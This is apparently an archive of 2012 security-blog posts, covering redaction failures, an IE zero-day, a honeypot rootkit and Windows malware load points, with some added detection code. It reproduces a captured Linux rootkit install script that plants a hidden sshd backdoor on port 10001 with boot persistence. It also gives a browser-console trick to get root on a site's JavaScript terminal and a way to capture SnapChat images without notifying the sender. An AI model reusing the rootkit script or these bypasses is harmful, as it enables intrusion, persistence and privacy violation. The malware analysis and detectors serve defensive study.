1. http://arstechnica.com/security/2012/09/godaddy-outage-caused-by-router-snafu-not-ddos-attack/?utm_source= feedburner&utm_medium=feed&utm_campaign=Feed%3A+arstechnica%2Findex+%28Ars+Technica+-+All+content%29 2. http://caffeinesecurity.blogspot.com/2012/03/how-to-mitigate-anonymous-internet.html 3. https://twitter.com/AnonymousOwn3r 4. http://techcrunch.com/2012/09/10/godaddy-outage-takes-down-millions-of-sites/ 5. http://uptime.netcraft.com/perf/graph?site=www.godaddy.com&tn&range=86400&sd=0&collector=all&sample=2 6. http://1.bp.blogspot.com/-HHPgeEoVTcU/UE51F6KTQJI/AAAAAAAAANg/zCFWrkFa6tQ/s1600/godaddy.png 7. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa1067/?p=w_aaaa1067 8. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa1095/?p=w_aaaa1095 9. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa1696/prgm.cgi 10. http://caffinesecurity-blogspot.tradepub.com/free/miss/?p=miss

2.9.7

Zombie Alert - How to Survive the Coming Zombie Apocalypse (2012-09-11 20:48)

Every day I come across interesting personal security stuff that just doesn't fit with the theme of this blog. In response to this, I have started a blog called [1]How to Survive the Coming Zombie Apocalypse. My goal is to make this a humorous, yet useful resource for personal security, preparedness, and self defense. I hope you enjoy the blog, as I have great plans for it.
1. http://bestzombiedefense.blogspot.com/

2.9.8

How Not to Redact a Document (2012-09-16 15:36)

In case you didn't know, Zynga and EA have been in a [1]legal battle over copying each other's games. Zynga has publicly posted an answer to EA's accusations as well as a [2]demand for jury trial. Also posted was a counterclaim with [3]redacted sections.

[4] However, Zynga's legal team did a very poor job of redacting the documents. Instead of removing the redacted text, they simply set its background to black. The text is still in the file, so the original redacted text can be revealed simply by highlighting it (or by copying it out, or by any tool that extracts text from the PDF).

[5] It's very important that document redaction methods be properly reviewed by IT staff prior to release: a redaction has to remove the text from the document (and from its metadata and any OCR layer), not draw a box over it. Without proper review of methods, sensitive information could be revealed, which could possibly cost an organization millions. Related Reading: [6]A Primer On Electronic Document Security
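An added example of the check the post asks for (my own code; it is not from the post, and it needs no PDF library): the text-showing operators in a PDF's content streams are read back regardless of what is painted over them, so a reviewer can search a "redacted" PDF for the phrases that were supposed to disappear. The sample PDF is constructed the way the post describes, text with a black rectangle drawn on top; the parser is a heuristic for simple streams (FlateDecode or uncompressed, literal strings only), not a full PDF reader.

```python
import re
import zlib

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
TJ_RE = re.compile(rb"\((.*?)(?<!\\)\)\s*Tj")            # (string) Tj
TJ_ARRAY_RE = re.compile(rb"\[(.*?)\]\s*TJ", re.DOTALL)   # [(str) kern (str) ...] TJ
PDF_STRING_RE = re.compile(rb"\((.*?)(?<!\\)\)")


def _unescape(raw):
    return raw.replace(b"\\(", b"(").replace(b"\\)", b")").replace(b"\\\\", b"\\")


def content_streams(pdf_bytes):
    """Yield every stream body, inflating FlateDecode streams; anything else is yielded raw."""
    for match in STREAM_RE.finditer(pdf_bytes):
        body = match.group(1)
        try:
            yield zlib.decompress(body)
        except zlib.error:
            yield body


def text_runs(pdf_bytes):
    """Every string drawn by a Tj/TJ operator, regardless of what is painted over it later."""
    runs = []
    for data in content_streams(pdf_bytes):
        for m in TJ_RE.finditer(data):
            runs.append(_unescape(m.group(1)))
        for m in TJ_ARRAY_RE.finditer(data):
            runs.append(b"".join(_unescape(s) for s in PDF_STRING_RE.findall(m.group(1))))
    return [r.decode("latin-1") for r in runs]


def leaked_phrases(pdf_bytes, phrases):
    """Phrases that were supposed to be redacted but are still drawn somewhere in the file."""
    haystack = " ".join(text_runs(pdf_bytes)).lower()
    return [p for p in phrases if p.lower() in haystack]


def build_sample_pdf():
    """Constructed one-page PDF that 'redacts' by painting a black box over live text."""
    page_ops = (b"BT /F1 12 Tf 72 700 Td (Revenue share: 40 percent) Tj ET\n"
                b"BT /F1 12 Tf 72 680 Td [(Counter) -20 (party: Acme)] TJ ET\n"
                b"0 g 70 676 220 36 re f\n")            # the black rectangle on top
    stream = zlib.compress(page_ops)
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R "
        b"/Resources << /Font << /F1 5 0 R >> >> >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(stream) + stream + b"\nendstream",
        b"<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>",
    ]
    out = b"%PDF-1.4\n"
    for num, body in enumerate(objects, 1):
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pdf()
    print(leaked_phrases(data, ["revenue share", "acme"]))
```

Note that a plain grep of the file finds nothing, because the content stream is deflated; that is exactly why a "looks black in the viewer, no hits in grep" check is not a redaction review. Fonts with custom encodings and hex strings would need more parsing than this, so treat an empty result as "nothing found by this heuristic", not as proof the text is gone.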
1. http://news.cnet.com/8301-10797_3-57513391-235/zynga-countersues-ea-for-alleged-anticompetitive-practices/ 2. http://www.scribd.com/doc/105947441/Part-2-Zynga-s-Answer-and-Demand-for-Jury-Trial 3. http://www.scribd.com/doc/105947608/Part-3-Counterclaim-Public 4. http://1.bp.blogspot.com/-3Dl9VBPZJ2A/UFYm2Fg7UnI/AAAAAAAAAOs/VuUuk8-AtYY/s1600/redacted.png 5. http://3.bp.blogspot.com/-Mx-pF6lT33A/UFYnpi3aVbI/AAAAAAAAAO0/6qP8256e26s/s1600/oops.png 6. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa2459/?p=w_aaaa2459

2.9.9

IE Zero Day Exploit in the Wild (2012-09-17 15:14)

There is an IE exploit in the wild which affects IE 7, 8, and 9. For more information, see the [1]SANS ISC post.
1. https://isc.sans.edu/diary/IE+Zero+Day+is+For+Real+/14107

2.9.10

IE Zero Day and Increase in Global Malware Indicators (2012-09-18 10:51)

A look at the [1]last 30 days of web searches for common malware infection indicators suggests that the [2]Internet Explorer zero day vulnerability has possibly been in the wild since September 12, 2012, or possibly as far back as September 8. On September 11, the indicator search volume was at 67 on a sliding scale. As of September 16, 2012 (the last day Google provides search data for at this time), the search volume had increased to 94. The search volume had peaked on September 2, and was on a fairly steady decline since, with the exception of a brief spike in search activity on September 8.
1. http://bit.ly/PfmTcT 2. http://www.securityweek.com/new-internet-explorer-zero-day-being-exploited-wild

2.9.11

Free trial of VIPRE Antivirus Business (2012-09-23 17:26)

Discover first hand the benefits of this security solution for your company. VIPRE Antivirus Business is cost-effective, easy-to-manage business virus protection for small- and medium-sized businesses. It's easy to set up and use via an intuitive management console. It's the business antivirus built with IT administrators in mind. Try VIPRE free for 30 days to see how this security solution can benefit your organization. This offer is intended for business use only. [1]Request your free trial today!
1. http://caffinesecurity-blogspot.tradepub.com/free/w_sb32/?p=w_sb32

2.10

October

2.10.1

Keccak Chosen by NIST as SHA-3 Hashing Algorithm (2012-10-04 14:00)

The National Institute of Standards and Technology has [1]chosen Keccak, designed by Guido Bertoni, Joan Daemen, Michaël Peeters and Gilles Van Assche, as the winner of the SHA-3 hashing competition! You can read more about Keccak at the official [2]web site.
1. http://csrc.nist.gov/groups/ST/hash/sha-3/winner_sha-3.html 2. http://keccak.noekeon.org/

2.10.2

Hurricane Sandy Fake Webcam Social Engineering Experiment (2012-10-30 16:42)

Yesterday I decided to perform a bit of a social engineering experiment on USTREAM. I provided "live coverage" of Hurricane Sandy from space.

[1] Of course by live coverage...I actually mean I took a photo which was published by NASA, added static, a nonsense cam label, and a timestamp, and streamed the image to USTREAM. I only posted a couple of links in my Twitter feed, and watched with amusement as others began to watch the channel, believing they really were seeing a live cam feed of Hurricane Sandy from space. The most interesting part of all this is that for hours people stared at an image which never actually changed...except for a small period of time when I added in a photoshopped UFO just for laughs.

[2] As you can see from this chart, the cam never took off in popularity, but according to USTREAM a total of 78 unique viewers watched my fake Sandy cam on 10/29...and not a single comment was posted accusing the cam of being fake. So what lessons can we take away from this? For one, it shows that social engineering is still an effective trick. Provide the user what they want to see, and they'll believe it's real. This is the same principle behind advance fee frauds and online lottery scams, just in a non-malicious way. I encourage readers to post their own thoughts on this experiment.

1. http://1.bp.blogspot.com/-4bOIykxEGR8/UJA24DyOx-I/AAAAAAAAAPQ/3t3jQR7IXu0/s1600/sandy-from-space-cam.png 2. https: //docs.google.com/spreadsheet/oimg?key=0AlZA4ubLZ4YKdEhRWXh2WkpQRlFRQlZqVjIwQkNKQlE&oid=2&zx=jycuk0nwqs20

2.11

November

2.11.1

FDA Fails to Properly Evaluate Medical Device Security per U.S. GAO Report (2012-11-04 22:41)

Warning: the contents of this blog post could (literally) give you a heart attack. The U.S. Government Accountability Office website has published an interesting report on information security and medical devices. Unfortunately this report has probably been missed amid all the U.S. election news.

[1] The 62 page report calls out the FDA on its 2001 and 2006 premarket reviews of two medical devices with known vulnerabilities and states that FDA "considered information security risks from unintentional threats, but not risks from intentional threats." While it is comforting to know that the FDA is looking at issues such as accidental electromagnetic interference, it worries me that the FDA is not considering more serious threats, such as intentional malicious interference with a device.

Specifically, FDA considered risks from unintentional threats for four of the eight information security control areas GAO selected for its evaluation: software testing, verification, and validation; risk assessments; access control; and contingency planning. However, the agency did not consider risks from intentional threats for these areas, nor did the agency provide evidence of its review for risks from either unintentional or intentional threats for the remaining four information security control areas: risk management, patch and vulnerability management, technical audit and accountability, and security-incident-response activities. According to FDA, it did not consider information security risks from intentional threats as a realistic possibility until recently. In commenting on a draft of this report, FDA said it intends to reassess its approach for evaluating software used in medical devices, including an assessment of information security risks.

This report is definitely an eye opening read, and also shows that the Federal Government is starting to think outside the box when it comes to information security.

Report: [2]Highlights - FDA Should Expand Its Consideration of Information Security for Certain Types of Devices [3]Download Full Report (PDF)
1. http://1.bp.blogspot.com/-3h8avOZMxqs/UJcywvQ3yZI/AAAAAAAAAPg/-15B2MiImAM/s1600/medHacking.png 2. http://www.gao.gov/products/GAO-12-816 3. http://www.gao.gov/assets/650/647767.pdf

2.11.2

Threat Watch updated to include Malware Indicator Trends (2012-11-13 12:16)

I've updated the [1]Threat Watch page to include global home-based malware infection indicators. Please note that this feature is still experimental. You can also [2]read more about how I created this map and graph.
1. http://caffeinesecurity.blogspot.com/p/threat-watch.html
2. http://caffeinesecurity.blogspot.com/2012/09/using-google-insights-to-track-computer.html

2.11.3

Google Two Factor Authentication - Protect Your Gmail and Google+ Account! (2012-11-21 21:31)

Have you secured your Google account with [1]two-factor authentication yet? If you have a smart phone such as a Blackberry, Android or iPhone, you can easily add an extra layer of protection to your Google account, including Gmail and Google+. The authenticator app is available at no charge whatsoever. Google [2]provides instructions on how to install the app for your phone. Once set up, you will be asked for a time-sensitive PIN provided by your smartphone when logging into your Google account. Even if your account password is stolen or guessed, your account will be secure! Read more at [3]Google's 2-step verification page.
1. http://support.google.com/accounts/bin/answer.py?hl=en&answer=180744
2. http://support.google.com/accounts/bin/answer.py?hl=en&answer=1066447
3. http://support.google.com/accounts/bin/topic.py?hl=en&topic=28786

2.11.4

Perpetual Efforts in Futility - A History of Computing Security (2012-11-24 20:06)

I've threatened to do this for a while now...and I've finally got the motivation to do so. I always said one of these days I need to write a book on all the crazy computer stuff I've seen over the years. But then it dawned on me...there is no real timeline out there of the history of computing security. Sure, some of it is interlaced between the pages of other computing history books or sites...but security is always an afterthought...a footnote. So why "Perpetual Efforts in Futility"? I've had that name picked out for years. Security has always been a cat-and-mouse game of seeing who can outsmart the other. Malware writers and other malicious individuals are always at odds with the security folks in a perpetual war which will never really end. So, using Blogger, I'm going to begin piecing together a timeline of the history of computing security. Eventually, when everything is complete to my satisfaction, maybe I'll even publish it as a book. Who knows! So without further delay, I present to you my first entry in Perpetual Efforts in Futility - an article about [1]the very first computer worm, Creeper. Please be sure to check [2]Perpetual Efforts in Futility for future updates!
1. http://perpetualfutility.blogspot.com/1971/03/creeper-first-computer-worm.html
2. http://perpetualfutility.blogspot.com/


2.11.5

Linux Rootkit bum.pdf dropped onto my Honeypot Today (2012-11-26 20:06)

A malicious user from Romania using PuTTY dropped off a Linux rootkit on my honeypot today. From my initial analysis it appears that the rootkit installs a hidden SSH server running on port 10001. I haven't had much time to look through the entire package, but if you'd like to browse what was dropped off, I have uploaded everything to [1]CaffSec-Malware-Analysis. If you find anything interesting please feel free to post a comment.

UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001. Read the article here: [2]http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp

Here is the install script for the main payload. Interesting stuff!

#!/bin/bash
# Disable shell history so the installation leaves no trace in the attacker's session
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
unset history
# Drop the bundled OpenSSL library the trojaned sshd depends on
mv libcrypto.so.4 /lib/
# Replace /usr/sbin/zdump with the backdoored sshd and make it immutable
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
# Unpack supporting files into a hidden directory
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ > /dev/null
# Stage the launcher under a name that looks like a header file
mkdir -p /usr/include/sound
mv sound.so /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
/usr/include/sound/sounds.h
# Persistence: append the launcher to the boot script, disguised as a comment block
echo "# Now that we have all of our basic modules loaded and the kernel going," >> /etc/rc.sysinit
echo "# lets dump the syslog ring somewhere so we can find it later" >> /etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >> /etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
# Remove the dropper directory
cd ..
rm -rf rks*
1. http://code.google.com/p/caffsec-malware-analysis/source/browse/#svn%2Ftrunk%2Fbum_rootkit
2. http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp
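A defender's triage check written for this post (an added example, not from the original post or the dropped package): it looks for the filesystem artifacts the install script above creates, the launcher line it appends to /etc/rc.sysinit, and a LISTEN socket on TCP 10001 parsed from /proc/net/tcp-style text. The fixture directory and the /proc/net/tcp excerpt are constructed so the check runs offline; on a live host you would pass root="/" and the real file contents.

```python
import tempfile
from pathlib import Path

# Indicators taken from the install script: paths it creates or moves into place.
DROPPED_PATHS = [
    "lib/libcrypto.so.4",
    "usr/include/X11/.swap",
    "usr/include/sound/sound.so",
    "usr/include/sound/sounds.h",
]
RC_SYSINIT = "etc/rc.sysinit"
RC_MARKERS = ("/usr/include/sound/sounds.h", "dump the syslog ring")
BACKDOOR_PORT = 10001


def listening_ports(proc_net_tcp_text: str) -> set:
    """Parse /proc/net/tcp(6)-style text: state 0A is LISTEN, local port is hex."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        local, state = fields[1], fields[3]
        if state == "0A":
            ports.add(int(local.rsplit(":", 1)[1], 16))
    return ports


def scan_bum_indicators(root: str, proc_net_tcp_text: str) -> list:
    """Return human-readable findings for the given filesystem root
    ("/" on a live host, or a mounted image's staging directory)."""
    findings = []
    base = Path(root)
    for rel in DROPPED_PATHS:
        if (base / rel).exists():
            findings.append(f"dropped artifact present: /{rel}")
    rc = base / RC_SYSINIT
    if rc.is_file():
        text = rc.read_text(errors="replace")
        if any(marker in text for marker in RC_MARKERS):
            findings.append(f"persistence hook appended to /{RC_SYSINIT}")
    if BACKDOOR_PORT in listening_ports(proc_net_tcp_text):
        findings.append(f"listener on TCP {BACKDOOR_PORT} (hidden sshd)")
    return findings


def build_infected_fixture() -> str:
    """Constructed sample: a throwaway tree mimicking the post-install state."""
    root = tempfile.mkdtemp(prefix="bum-fixture-")
    for rel in ("lib/libcrypto.so.4", "usr/include/sound/sounds.h"):
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("constructed placeholder\n")
    Path(root, "usr/include/X11/.swap").mkdir(parents=True)
    rc = Path(root, "etc/rc.sysinit")
    rc.parent.mkdir(parents=True)
    rc.write_text("#!/bin/bash\n# normal boot script\n"
                  "# lets dump the syslog ring somewhere so we can find it later\n"
                  "/usr/include/sound/sounds.h\n")
    return root


# Constructed /proc/net/tcp excerpt: sshd listening on 22, the backdoor on
# 0x2711 = 10001, and one ESTABLISHED connection that must not count as a listener.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:2711 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 100 0 0 10 0
"""

if __name__ == "__main__":
    for finding in scan_bum_indicators(build_infected_fixture(), SAMPLE_PROC_NET_TCP):
        print("[!]", finding)
```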

2.12

December

2.12.1

Detecting Targeted Malware and Advanced Persistent Threats (2012-12-06 19:24)

When dealing with malware, typically your last line of defense is your antivirus. In order for malware to slip past antivirus scanning software, the malware needs to first bypass your perimeter network defenses, such as a Network Intrusion Prevention System (NIPS) and network firewall, as well as your Host Intrusion Prevention System (HIPS) and host-based firewall. Multiple layers of protection should block a large number of threats to your organization.

Typically, most of the malware which will bypass all of your security layers is targeted malware...never before seen in the wild. If the malware is advanced enough, it will be able to slip past your heuristic defenses, and since it has never been seen in the wild, it will go unnoticed by your signature-based antivirus scans. If you're fortunate enough to detect some sign of trouble, the first thing you should do is begin checking common malware load points. Don't bother trying to look for the proverbial needle in a haystack and find the file which infected your system. Be aware that there are only a few load points which will be used by malware, and begin your search there. Norton has a wonderful [1]Malware Removal Guide available which identifies the common load points of malware for Windows. For your reference, I'll reproduce the list here:

Registry Keys:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
HKEY_CLASSES_ROOT\comfile\shell\open\command
HKEY_CLASSES_ROOT\piffile\shell\open\command
HKEY_CLASSES_ROOT\exefile\shell\open\command
HKEY_CLASSES_ROOT\txtfile\shell\open\command
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKLM\SYSTEM\CurrentControlSet\Services\ (look for suspect services which don't belong)
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\

There are a few additional locations which could be used as malware load points:

Wininit.ini - In my experience it's rare for malware to use this as an infection point, but it's possible. Win.ini and system.ini are also possible. These files are located under c:\windows.

Another, more common, load point is the Startup folder. However, it's important to note that there are multiple Startup folders - User, Default User, and All Users. These could be under c:\Documents and Settings, c:\Users, or c:\Windows. Some old-fashioned load points are autoexec.bat, config.sys, and the task scheduler. The Norton article also mentions dosstart.bat, but that would most likely apply only to very old systems. Additional locations which Norton doesn't mention, and which should be checked, are your network shares and network startup scripts. It is very possible that, should malware somehow gain administrative privileges (your users ARE using non-administrative accounts, right?), it could push a startup script to all of your systems, resulting in constant reinfection. Autorun.inf on network shares would be another good indicator of a malware infection - and should provide valuable insight into the inner workings of the malware. Finally, don't fall for the needle-in-a-haystack trap which Norton mentions of searching the Windows and Temp folders. While malware may reside there, it's important to realize that the malware has to be executed from somewhere. Identify where the malware is being loaded from, then use that knowledge to identify the malicious files. Should you find a piece of targeted malware, your best bet is to rebuild or re-image the affected systems. You never know what additional surprises the malware has delivered. Remember - the best way of dealing with an advanced persistent threat is not to be affected by one in the first place. Follow best security practices, lock down your systems, and apply multiple layers of protection. And finally, don't allow your users to have local administrative rights - targeted malware can't infect a system as severely if the user isn't a local administrator in the first place.

1. http://us.norton.com/support/premium_services/malware_removal_guide.pdf
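An added example (not from the post or the Norton guide) for working the load-point list above offline: parse the text produced by `reg export` from a suspect machine, pull every value under the load-point keys that hold command lines, and flag commands that execute out of a Temp directory, the "where is it being loaded from" question the post asks. The export text is constructed; the key set is the subset of the keys above that store run commands, and the Temp heuristic is an assumption of this example.

```python
import re

# Load points reproduced from the list above that hold command lines (matched case-insensitively).
LOAD_POINT_KEYS = {
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler",
}
# Heuristic (assumption): a load point that executes from a temp directory deserves a look.
SUSPECT_DIRS = ("\\temp\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\")

# "name"=data or @=data; .reg files escape backslashes and quotes inside strings.
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')


def _unescape(s: str) -> str:
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg_export(text: str) -> dict:
    """Parse 'reg export' text into {key: {value_name: data}}. REG_SZ data is
    unescaped; other types (dword:, hex(2):...) are kept as their raw literal."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and (m := _VALUE_RE.match(line)):
            name = "(Default)" if m.group(2) else _unescape(m.group(1))
            data = m.group(3)
            if data.startswith('"') and data.endswith('"'):
                data = _unescape(data[1:-1])
            keys[current][name] = data
    return keys


def load_point_entries(reg: dict) -> list:
    """Every value under a known load point, as (key, name, data) tuples."""
    wanted = {k.lower() for k in LOAD_POINT_KEYS}
    return [(k, n, d) for k, vals in reg.items() if k.lower() in wanted
            for n, d in vals.items()]


def suspicious_entries(reg: dict) -> list:
    """Load-point entries whose command runs out of a temp directory."""
    return [e for e in load_point_entries(reg)
            if any(s in e[2].lower() for s in SUSPECT_DIRS)]


# Constructed export: one benign Run value, one Run value executing from the user's
# Temp folder, an unrelated Uninstall key, and a RunOnce value under C:\Windows\Temp.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"Updater"="\"C:\\Users\\bob\\AppData\\Local\\Temp\\svch0st.exe\" -silent"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Foo]
"DisplayName"="Foo 1.0"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="C:\\Windows\\Temp\\cl.bat"
'''

if __name__ == "__main__":
    reg = parse_reg_export(SAMPLE_REG_EXPORT)
    for key, name, data in load_point_entries(reg):
        flag = "[!]" if (key, name, data) in suspicious_entries(reg) else "   "
        print(flag, key, "|", name, "=", data)
```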

2.12.2

How (not) to handle software vulnerability submissions (2012-12-26 11:51)

If you're a software vendor developing programs more complex than "Hello World", eventually you will face an issue with a security vulnerability in your products. For those who don't know, I currently have an automated crawler searching Pastebin for new exploits and vulnerabilities. This crawler reports its results live via the Twitter hashtag [1]#exploitAlert. Every once in a while, if something catches my attention, I'll submit it to the software vendor. For most vendors the process is very straightforward...just send an email or fill out a form. For an example of the right way to allow submissions of security vulnerabilities, take a look at [2]Microsoft's method. Recently a supposed 0-day vulnerability for Parallels Plesk was found by my crawler (a permanent copy of this paste is available [3]here). I've never worked with Parallels software before, so I went to their website to try and find out where to submit a vulnerability. Finally I found it was an option on their support form. My jaw dropped when I saw the warning at the bottom of the support form...

[4]

Well, that certainly puts a stopper on things. I'm not a paying customer...so obviously I won't be able to continue. And what's even worse...if I were a paying customer...I would be CHARGED for submitting a security vulnerability! Policies such as the one above will only cause frustrated users to post the vulnerability publicly instead of through [5]responsible disclosure. If anyone from Parallels reads this, I would like to encourage you to push for reform of your vulnerability submission practices.

1. https://twitter.com/search?q=%23exploitAlert&src=hash
2. http://technet.microsoft.com/en-us/security/ff852094.aspx
3. http://pastebin.com/tDvyMG9L
4. http://1.bp.blogspot.com/-KJbcp4GoY8Y/UNstRuTgcqI/AAAAAAAAAQY/dDTYftb1Q4Q/s1600/plesk.jpg
5. http://www.sans.org/reading_room/whitepapers/threats/define-responsible-disclosure_932


2.12.3

Snapchat Covert Screen Capture for Android Revealed (2012-12-30 03:02)

[1] Capture of a SnapChat image.

Concerned about protecting your privacy? Get the [2]FREE guide to Facebook Privacy!

At a family gathering today, a relative introduced me to SnapChat, and showed me how it only temporarily stores images, then deletes them when you're finished looking at them. For those who don't know, SnapChat is a temporary image service. The concept is simple - images are sent, viewed, and destroyed within 10 seconds. If a user attempts to take a screenshot of the image, the sender is sent a notification. I tested the screenshot detection and sure enough...if you take a screenshot with your Android phone it really does send a notification! It was recently revealed that there is a method of [3]capturing SnapChat images for iOS without the sender knowing, by accessing the files directly on the device's storage. But this only works on iPhone or iPod Touch. Always up for a challenge, I decided to see if I could bypass SnapChat's temporary storage and save a permanent copy of photos I receive. After performing some analysis of how SnapChat works, today I'm going to reveal how to permanently save incoming SnapChat photos on any Android phone. Android phones have a feature called USB Debugging which is commonly only used by tech-savvy users or developers. This feature allows you to connect your Android phone to your computer and monitor its activities using the Android SDK. One of the features of the Android SDK is, you guessed it, a screen capture utility. By simply following [4]these instructions from AddictiveTips.com you can capture the current screen without alerting the SnapChat app. Simply time clicking the Refresh button just right and you'll be able to capture that secret photo. Note that this is not a flaw in the SnapChat app - this is the intentional design of the Android operating system. This is a high-tech method of defeating SnapChat.

A low-tech, undetectable method would be to simply take a picture of your phone's screen using a camera on another device. So what should users take away from this? A simple security lesson - if you don't want someone to be able to save something you send them, and don't want to risk that knowledge or picture being posted publicly, then don't send it to anyone in the first place.
1. http://3.bp.blogspot.com/-_LfUqtFqsDw/UN_wPWfFWMI/AAAAAAAAAQo/IHYpsEHwNV4/s1600/device-2012-12-30-023949.png
2. http://caffinesecurity-blogspot.tradepub.com/free/w_make16/?p=w_make16
3. http://marketingland.com/save-snapchat-private-facebook-poke-pictures-as-security-flaw-lets-users-keep-temporary-content-29625?utm_source=feedburner&utm_medium=feed&utm_campaign=feed-sphinn
4. http://www.addictivetips.com/mobile/how-to-take-screenshots-in-android-using-android-sdk/

2.12.4

Root @th3j35t3r with Google Chrome (2012-12-31 13:46)

Today we're going to have a lesson on password strength and software vulnerabilities. Disclaimer: Th3J35t3r's site has served targeted malware in the past designed to capture data... especially from members of Anonymous. Perform these steps at your own risk! There's something interesting afoot on [1]The Jester's website... In the upper right corner there's a little Pi symbol. If you've ever watched the movie The Net, you know that interesting secrets are beneath the Pi symbol.

[2] After clicking on the Pi icon you are presented with a UNIX style login prompt.

[3] The login prompt allows you to log in with the username "guest" and no password. However, any attempts to log in as root are met with a password prompt. If you peek under the hood of the JavaScript running this terminal, you'll find the following:

var conf_rootpassskey="5f7588bd54449";

However, this is an encrypted or hashed password, as any attempts to log in using this as the password fail. Instead of attacking the password, let's attack the underlying software itself.
Note: To perform these steps you MUST use Google Chrome. Open the JavaScript console using Ctrl+Shift+J. Then enter the following command:

conf_rootpassskey="";

[4] Now you should be able to gain root access to Jesters system with no problem. Use the username root and simply hit enter at the password prompt to enter a null password.

[5]

